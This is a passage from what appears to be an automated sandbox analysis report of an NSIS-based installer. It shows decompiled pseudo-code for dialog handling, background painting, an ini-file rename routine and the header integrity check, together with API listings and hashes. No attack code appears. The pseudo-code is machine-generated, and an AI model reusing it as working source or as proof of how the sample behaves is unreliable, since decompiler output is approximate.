				_push(0x23);
				E00403F18(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00403F3A( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00403F4D(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x423eb0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x41f464 =  *0x41f464 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x420480 =  *0x420480 & 0x00000000;
				return 0;
			}

















                                                                                                    0x00404070
                                                                                                    0x00404196
                                                                                                    0x004041f2
                                                                                                    0x004041f6
                                                                                                    0x004042cd
                                                                                                    0x004042cf
                                                                                                    0x004042cf
                                                                                                    0x004042d5
                                                                                                    0x004042d5
                                                                                                    0x004042d8
                                                                                                    0x00000000
                                                                                                    0x004042df
                                                                                                    0x00404204
                                                                                                    0x00404206
                                                                                                    0x00404210
                                                                                                    0x0040421b
                                                                                                    0x0040421e
                                                                                                    0x00404221
                                                                                                    0x0040422c
                                                                                                    0x0040422f
                                                                                                    0x00404236
                                                                                                    0x00404244
                                                                                                    0x0040425c
                                                                                                    0x00404264
                                                                                                    0x0040426f
                                                                                                    0x0040427f
                                                                                                    0x00404281
                                                                                                    0x00404281
                                                                                                    0x00404236
                                                                                                    0x0040428b
                                                                                                    0x00000000
                                                                                                    0x00404296
                                                                                                    0x0040429a
                                                                                                    0x004042ab
                                                                                                    0x004042ab
                                                                                                    0x004042b1
                                                                                                    0x004042bf
                                                                                                    0x004042bf
                                                                                                    0x00000000
                                                                                                    0x004042c3
                                                                                                    0x0040428b
                                                                                                    0x004041a1
                                                                                                    0x00000000
                                                                                                    0x004041b5
                                                                                                    0x004041bb
                                                                                                    0x004041c1
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004041e6
                                                                                                    0x004041e8
                                                                                                    0x004041ed
                                                                                                    0x00000000
                                                                                                    0x004041ed
                                                                                                    0x004041a1
                                                                                                    0x00404076
                                                                                                    0x00404079
                                                                                                    0x0040407e
                                                                                                    0x0040408f
                                                                                                    0x0040408f
                                                                                                    0x00404096
                                                                                                    0x00404099
                                                                                                    0x0040409b
                                                                                                    0x004040a0
                                                                                                    0x004040a9
                                                                                                    0x004040af
                                                                                                    0x004040bb
                                                                                                    0x004040be
                                                                                                    0x004040c7
                                                                                                    0x004040cc
                                                                                                    0x004040cf
                                                                                                    0x004040d4
                                                                                                    0x004040eb
                                                                                                    0x004040f2
                                                                                                    0x00404105
                                                                                                    0x00404108
                                                                                                    0x0040411d
                                                                                                    0x00404124
                                                                                                    0x00404129
                                                                                                    0x0040412e
                                                                                                    0x0040412e
                                                                                                    0x0040413d
                                                                                                    0x0040414c
                                                                                                    0x0040414e
                                                                                                    0x00404164
                                                                                                    0x00404173
                                                                                                    0x00404175
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004040EB
                                                                                                    • GetDlgItem.USER32 ref: 004040FF
                                                                                                    • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 0040411D
                                                                                                    • GetSysColor.USER32(?), ref: 0040412E
                                                                                                    • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 0040413D
                                                                                                    • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 0040414C
                                                                                                    • lstrlenA.KERNEL32(?), ref: 00404156
                                                                                                    • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404164
                                                                                                    • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404173
                                                                                                    • GetDlgItem.USER32 ref: 004041D6
                                                                                                    • SendMessageA.USER32(00000000), ref: 004041D9
                                                                                                    • GetDlgItem.USER32 ref: 00404204
                                                                                                    • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404244
                                                                                                    • LoadCursorA.USER32 ref: 00404253
                                                                                                    • SetCursor.USER32(00000000), ref: 0040425C
                                                                                                    • ShellExecuteA.SHELL32(0000070B,open,@.B,00000000,00000000,00000001), ref: 0040426F
                                                                                                    • LoadCursorA.USER32 ref: 0040427C
                                                                                                    • SetCursor.USER32(00000000), ref: 0040427F
                                                                                                    • SendMessageA.USER32(00000111,00000001,00000000), ref: 004042AB
                                                                                                    • SendMessageA.USER32(00000010,00000000,00000000), ref: 004042BF
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                    • String ID: @.B$N$open
                                                                                                    • API String ID: 3615053054-3815657624
                                                                                                    • Opcode ID: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                                    • Instruction ID: 7761d7a6ce13443680711406d70bf9c6d022160e69bfd2fffc9b265f6460a43d
                                                                                                    • Opcode Fuzzy Hash: e8b988e3949f0b6d91b1b58256fef292242953983a672fd1ea6cb44b2e1e2ed0
                                                                                                    • Instruction Fuzzy Hash: 4661B2B1A40209BFEB109F60DC45F6A3B69FB44755F10817AFB04BA2D1C7B8A951CF98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 90%
                                                                                                    			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x423eb0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x4236a0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x423ea8;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                                    0x0040100a
                                                                                                    0x00401039
                                                                                                    0x00401047
                                                                                                    0x0040104d
                                                                                                    0x00401051
                                                                                                    0x0040105b
                                                                                                    0x00401061
                                                                                                    0x00401064
                                                                                                    0x004010f3
                                                                                                    0x00401089
                                                                                                    0x0040108c
                                                                                                    0x004010a6
                                                                                                    0x004010bd
                                                                                                    0x004010cc
                                                                                                    0x004010cf
                                                                                                    0x004010d5
                                                                                                    0x004010d9
                                                                                                    0x004010e4
                                                                                                    0x004010ed
                                                                                                    0x004010ef
                                                                                                    0x004010ef
                                                                                                    0x00401100
                                                                                                    0x00401105
                                                                                                    0x0040110d
                                                                                                    0x00401110
                                                                                                    0x00401112
                                                                                                    0x00401118
                                                                                                    0x0040111f
                                                                                                    0x00401126
                                                                                                    0x00401130
                                                                                                    0x00401142
                                                                                                    0x00401156
                                                                                                    0x00401160
                                                                                                    0x00401165
                                                                                                    0x00401165
                                                                                                    0x00401110
                                                                                                    0x0040116e
                                                                                                    0x00000000
                                                                                                    0x00401178
                                                                                                    0x00401010
                                                                                                    0x00401013
                                                                                                    0x00401015
                                                                                                    0x0040101f
                                                                                                    0x0040101f
                                                                                                    0x00000000

                                                                                                    APIs
                                                                                                    • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                    • GetClientRect.USER32 ref: 0040105B
                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                    • FillRect.USER32 ref: 004010E4
                                                                                                    • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                    • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                    • DrawTextA.USER32(00000000,004236A0,000000FF,00000010,00000820), ref: 00401156
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                    • DeleteObject.GDI32(?), ref: 00401165
                                                                                                    • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                    • String ID: F
                                                                                                    • API String ID: 941294808-1304234792
                                                                                                    • Opcode ID: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                                    • Instruction ID: 81477e3a2fde3fb3f26aa953fc06e347994717d76cab2c79682594c458f31f57
                                                                                                    • Opcode Fuzzy Hash: 1fa3053a276be56ef7da5d68adfba1d9971bfb9fa2beb597bf2db4fb963a824d
                                                                                                    • Instruction Fuzzy Hash: 8141BC71804249AFCB058FA4CD459BFBFB9FF44314F00802AF551AA1A0C378EA54DFA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004058B4, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 144filememoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 93%
                                                                                                    			E004058B4() {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405E88(1);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x423f30 =  *0x423f30 + 1;
						return _t20;
					}
				}
				 *0x422630 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x4220a8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x421ca8, "%s=%s\r\n", 0x422630, 0x4220a8);
						_t56 = _t55 + 0x10;
						E00405B88(_t43, 0x400, 0x4220a8, 0x4220a8,  *((intOrPtr*)( *0x423eb0 + 0x128)));
						_t20 = E0040583D(0x4220a8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E004057B2(_t51, "[Rename]\r\n") != 0) {
								_t28 = E004057B2(_t26 + 0xa, 0x409350);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004057FE(_t51 + _t29, 0x421ca8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405B66(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040583D(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x422630, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                                                                                                    0x004058ba
                                                                                                    0x004058c1
                                                                                                    0x004058c5
                                                                                                    0x004058ce
                                                                                                    0x004058d2
                                                                                                    0x00405a11
                                                                                                    0x00405a11
                                                                                                    0x00000000
                                                                                                    0x00405a11
                                                                                                    0x004058d2
                                                                                                    0x004058de
                                                                                                    0x004058f4
                                                                                                    0x0040591c
                                                                                                    0x00405927
                                                                                                    0x0040592b
                                                                                                    0x0040594b
                                                                                                    0x00405952
                                                                                                    0x0040595c
                                                                                                    0x00405969
                                                                                                    0x0040596e
                                                                                                    0x00405973
                                                                                                    0x00405977
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405986
                                                                                                    0x00405988
                                                                                                    0x00405995
                                                                                                    0x00405999
                                                                                                    0x00405a0a
                                                                                                    0x00405a0b
                                                                                                    0x00000000
                                                                                                    0x004059b5
                                                                                                    0x004059c2
                                                                                                    0x00405a27
                                                                                                    0x00405a2e
                                                                                                    0x004059d5
                                                                                                    0x004059d5
                                                                                                    0x004059d7
                                                                                                    0x004059e0
                                                                                                    0x004059eb
                                                                                                    0x004059fd
                                                                                                    0x00405a04
                                                                                                    0x00000000
                                                                                                    0x00405a04
                                                                                                    0x00405a30
                                                                                                    0x00405a31
                                                                                                    0x00405a36
                                                                                                    0x00405a38
                                                                                                    0x00405a45
                                                                                                    0x00405a45
                                                                                                    0x00405a49
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00405a3a
                                                                                                    0x00405a3a
                                                                                                    0x00405a3d
                                                                                                    0x00405a40
                                                                                                    0x00405a41
                                                                                                    0x00000000
                                                                                                    0x00405a3a
                                                                                                    0x004059cd
                                                                                                    0x004059d2
                                                                                                    0x00000000
                                                                                                    0x004059d2
                                                                                                    0x00405999
                                                                                                    0x004058f6
                                                                                                    0x00405901
                                                                                                    0x0040590a
                                                                                                    0x0040590e
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x0040590e
                                                                                                    0x00405a1b

                                                                                                    APIs
                                                                                                      • Part of subcall function 00405E88: GetModuleHandleA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405E9A
                                                                                                      • Part of subcall function 00405E88: LoadLibraryA.KERNEL32(?,?,00000000,0040327F,00000008), ref: 00405EA5
                                                                                                      • Part of subcall function 00405E88: GetProcAddress.KERNEL32(00000000,?), ref: 00405EB6
                                                                                                    • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405649,?,00000000,000000F1,?), ref: 00405901
                                                                                                    • GetShortPathNameA.KERNEL32 ref: 0040590A
                                                                                                    • GetShortPathNameA.KERNEL32 ref: 00405927
                                                                                                    • wsprintfA.USER32 ref: 00405945
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,004220A8,C0000000,00000004,004220A8,?,?,?,00000000,000000F1,?), ref: 00405980
                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 0040598F
                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004059A5
                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA8,00000000,-0000000A,00409350,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004059EB
                                                                                                    • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 004059FD
                                                                                                    • GlobalFree.KERNEL32 ref: 00405A04
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405A0B
                                                                                                      • Part of subcall function 004057B2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057B9
                                                                                                      • Part of subcall function 004057B2: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059C0,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057E9
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
                                                                                                    • String ID: %s=%s$0&B$[Rename]
                                                                                                    • API String ID: 3772915668-951905037
                                                                                                    • Opcode ID: 0c179fa3417d280b53e5d95a4378c92fb06f2b6e7dc6de3d5fc3f6893b1dd3a2
                                                                                                    • Instruction ID: 8912a0e40cac8f66f34925055924fb713260e7a12edb00ecfb1cfbef244c1689
                                                                                                    • Opcode Fuzzy Hash: 0c179fa3417d280b53e5d95a4378c92fb06f2b6e7dc6de3d5fc3f6893b1dd3a2
                                                                                                    • Instruction Fuzzy Hash: D9411332B05B11BBD3216B61AD88F6B3A5CDB84715F140136FE05F22C2E678A801CEBD
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00402C72, Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 95%
                                                                                                    			E00402C72(void* __eflags, signed int _a4) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v300;
				long _t54;
				void* _t62;
				intOrPtr _t65;
				intOrPtr* _t70;
				long _t82;
				signed int _t89;
				intOrPtr _t92;
				void* _t101;
				void* _t105;
				long _t106;
				long _t109;
				intOrPtr* _t110;

				_v8 = 0;
				_v12 = 0;
				 *0x423eac = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, 0x42ac00, 0x400);
				_t105 = E0040583D(0x42ac00, 0x80000000, 3);
				 *0x409014 = _t105;
				if(_t105 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405B66(0x429c00, 0x42ac00);
				E00405B66(0x42b000, E004056A0(0x429c00));
				_t54 = GetFileSize(_t105, 0);
				 *0x41f050 = _t54;
				_t109 = _t54;
				if(_t54 <= 0) {
					L22:
					E00402BD3(1);
					if( *0x423eb4 == 0) {
						goto L30;
					}
					if(_v12 == 0) {
						L26:
						_t110 = GlobalAlloc(0x40, _v20);
						E00405F62(0x40afb8);
						E0040586C( &_v300, 0x42a400);
						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0);
						 *0x409018 = _t62;
						if(_t62 != 0xffffffff) {
							_t65 = E004031F1( *0x423eb4 + 0x1c);
							 *0x41f054 = _t65;
							 *0x417048 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c;
							if(E00402F18(_v16, 0xffffffff, 0, _t110, _v20) == _v20) {
								 *0x423eb0 = _t110;
								 *0x423eb8 =  *_t110;
								if((_v40 & 0x00000001) != 0) {
									 *0x423ebc =  *0x423ebc + 1;
								}
								_t45 = _t110 + 0x44; // 0x44
								_t70 = _t45;
								_t101 = 8;
								do {
									_t70 = _t70 - 8;
									 *_t70 =  *_t70 + _t110;
									_t101 = _t101 - 1;
								} while (_t101 != 0);
								 *((intOrPtr*)(_t110 + 0x3c)) =  *0x417044;
								E004057FE(0x423ec0, _t110 + 4, 0x40);
								return 0;
							}
							goto L30;
						}
						return "Error writing temporary file. Make sure your temp folder is valid.";
					}
					E004031F1( *0x417040);
					if(E004031BF( &_a4, 4) == 0 || _v8 != _a4) {
						goto L30;
					} else {
						goto L26;
					}
				} else {
					do {
						_t106 = _t109;
						asm("sbb eax, eax");
						_t82 = ( ~( *0x423eb4) & 0x00007e00) + 0x200;
						if(_t109 >= _t82) {
							_t106 = _t82;
						}
						if(E004031BF(0x417050, _t106) == 0) {
							E00402BD3(1);
							L30:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x423eb4 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BD3(0);
							}
							goto L19;
						}
						E004057FE( &_v40, 0x417050, 0x1c);
						_t89 = _v40;
						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
							_a4 = _a4 | _t89;
							 *0x423f40 =  *0x423f40 | _a4 & 0x00000002;
							_t92 = _v16;
							 *0x423eb4 =  *0x417040;
							if(_t92 > _t109) {
								goto L30;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v12 = _v12 + 1;
								_t109 = _t92 - 4;
								if(_t106 > _t109) {
									_t106 = _t109;
								}
								goto L19;
							} else {
								goto L22;
							}
						}
						L19:
						if(_t109 <  *0x41f050) {
							_v8 = E00405EF4(_v8, 0x417050, _t106);
						}
						 *0x417040 =  *0x417040 + _t106;
						_t109 = _t109 - _t106;
					} while (_t109 > 0);
					goto L22;
				}
			}

























                                                                                                    0x00402c80
                                                                                                    0x00402c83
                                                                                                    0x00402c9d
                                                                                                    0x00402ca2
                                                                                                    0x00402cb5
                                                                                                    0x00402cba
                                                                                                    0x00402cc0
                                                                                                    0x00000000
                                                                                                    0x00402cc2
                                                                                                    0x00402cd3
                                                                                                    0x00402ce4
                                                                                                    0x00402ceb
                                                                                                    0x00402cf3
                                                                                                    0x00402cf8
                                                                                                    0x00402cfa
                                                                                                    0x00402dea
                                                                                                    0x00402dec
                                                                                                    0x00402df8
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00402e01
                                                                                                    0x00402e2d
                                                                                                    0x00402e3d
                                                                                                    0x00402e3f
                                                                                                    0x00402e50
                                                                                                    0x00402e6b
                                                                                                    0x00402e74
                                                                                                    0x00402e79
                                                                                                    0x00402e98
                                                                                                    0x00402ea8
                                                                                                    0x00402eba
                                                                                                    0x00402ec7
                                                                                                    0x00402ed4
                                                                                                    0x00402edc
                                                                                                    0x00402ee1
                                                                                                    0x00402ee3
                                                                                                    0x00402ee3
                                                                                                    0x00402eeb
                                                                                                    0x00402eeb
                                                                                                    0x00402eee
                                                                                                    0x00402eef
                                                                                                    0x00402eef
                                                                                                    0x00402ef2
                                                                                                    0x00402ef4
                                                                                                    0x00402ef4
                                                                                                    0x00402efe
                                                                                                    0x00402f0a
                                                                                                    0x00000000
                                                                                                    0x00402f0f
                                                                                                    0x00000000
                                                                                                    0x00402ec7
                                                                                                    0x00000000
                                                                                                    0x00402e7b
                                                                                                    0x00402e09
                                                                                                    0x00402e1b
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00402d00
                                                                                                    0x00402d00
                                                                                                    0x00402d05
                                                                                                    0x00402d09
                                                                                                    0x00402d10
                                                                                                    0x00402d17
                                                                                                    0x00402d19
                                                                                                    0x00402d19
                                                                                                    0x00402d28
                                                                                                    0x00402e87
                                                                                                    0x00402ec9
                                                                                                    0x00000000
                                                                                                    0x00402ec9
                                                                                                    0x00402d34
                                                                                                    0x00402db8
                                                                                                    0x00402dbb
                                                                                                    0x00402dc0
                                                                                                    0x00000000
                                                                                                    0x00402db8
                                                                                                    0x00402d41
                                                                                                    0x00402d46
                                                                                                    0x00402d4e
                                                                                                    0x00402d74
                                                                                                    0x00402d83
                                                                                                    0x00402d89
                                                                                                    0x00402d8e
                                                                                                    0x00402d94
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00402d9e
                                                                                                    0x00402da6
                                                                                                    0x00402da9
                                                                                                    0x00402dae
                                                                                                    0x00402db0
                                                                                                    0x00402db0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00402d9e
                                                                                                    0x00402dc1
                                                                                                    0x00402dc7
                                                                                                    0x00402dd7
                                                                                                    0x00402dd7
                                                                                                    0x00402dda
                                                                                                    0x00402de0
                                                                                                    0x00402de2
                                                                                                    0x00000000
                                                                                                    0x00402d00

                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00402C86
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,0042AC00,00000400), ref: 00402CA2
                                                                                                      • Part of subcall function 0040583D: GetFileAttributesA.KERNEL32(00000003,00402CB5,0042AC00,80000000,00000003), ref: 00405841
                                                                                                      • Part of subcall function 0040583D: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405863
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,00429C00,00429C00,0042AC00,0042AC00,80000000,00000003), ref: 00402CEB
                                                                                                    • GlobalAlloc.KERNEL32(00000040,00409130), ref: 00402E32
                                                                                                    Strings
                                                                                                    • Null, xrefs: 00402D6B
                                                                                                    • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402EC9
                                                                                                    • Error launching installer, xrefs: 00402CC2
                                                                                                    • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00402E7B
                                                                                                    • soft, xrefs: 00402D62
                                                                                                    • Inst, xrefs: 00402D59
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.429792160.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000001.00000002.429781321.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429813163.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429828354.0000000000409000.00000008.00020000.sdmp Download File
                                                                                                    • Associated: 00000001.00000002.429836549.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                    Similarity
                                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                                    • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                                    • API String ID: 2803837635-3016655952
                                                                                                    • Opcode ID: e7df49d95806c95de26f98ca649352fb28c1b8666106fc25876ed78084823f77
                                                                                                    • Instruction ID: 0b72a330c31c6d4d52753dad6a5c3012229d4666e6dae103a7747cbc92612fb8
                                                                                                    • Opcode Fuzzy Hash: e7df49d95806c95de26f98ca649352fb28c1b8666106fc25876ed78084823f77
